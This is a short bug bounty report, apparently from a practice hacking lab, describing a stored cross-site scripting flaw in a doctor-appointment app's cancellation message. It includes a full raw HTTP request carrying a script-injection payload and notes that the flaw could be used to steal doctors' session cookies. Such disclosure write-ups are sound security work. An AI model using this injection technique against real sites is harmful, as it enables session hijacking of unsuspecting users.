BugBountyHunter

Hey!

I found a stored XSS on /cancelled.php, caused by the unsanitized appointment message that gets reflected on the page.

To reproduce this you first need to cancel any of your appointments with a malicious message:

POST /api/ma.php HTTP/1.1
Host: b6a5124dc2a4-0x1452.a.firstbloodhackers.com
Cookie: drps=10f43143cf094d9363fc08ee7
Content-Length: 102
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Csrf: 99215d4e-0ff3-4275
X-Site-Req: permitted
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://b6a5124dc2a4-0x1452.a.firstbloodhackers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://b6a5124dc2a4-0x1452.a.firstbloodhackers.com/manageappointment.php?success&aptid=1f53ee02-c444-4104-8adf-19590b043cbe
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

act=cancel&id=1f53ee02-c444-4104-8adf-19590b043cbe&message=yo"><script>alert(document.domain)</script>

When a logged in doctor now navigates to /drpanel/cancelled.php, the XSS will fire:

This was reported in the previous version and previously required some filter bypasses. In this version there isn't any filtering in place at all.

Impact

An attacker can cancel their appointment with a malicious message, allowing them to steal the session cookie of any doctor that visits the Cancelled Appointments page.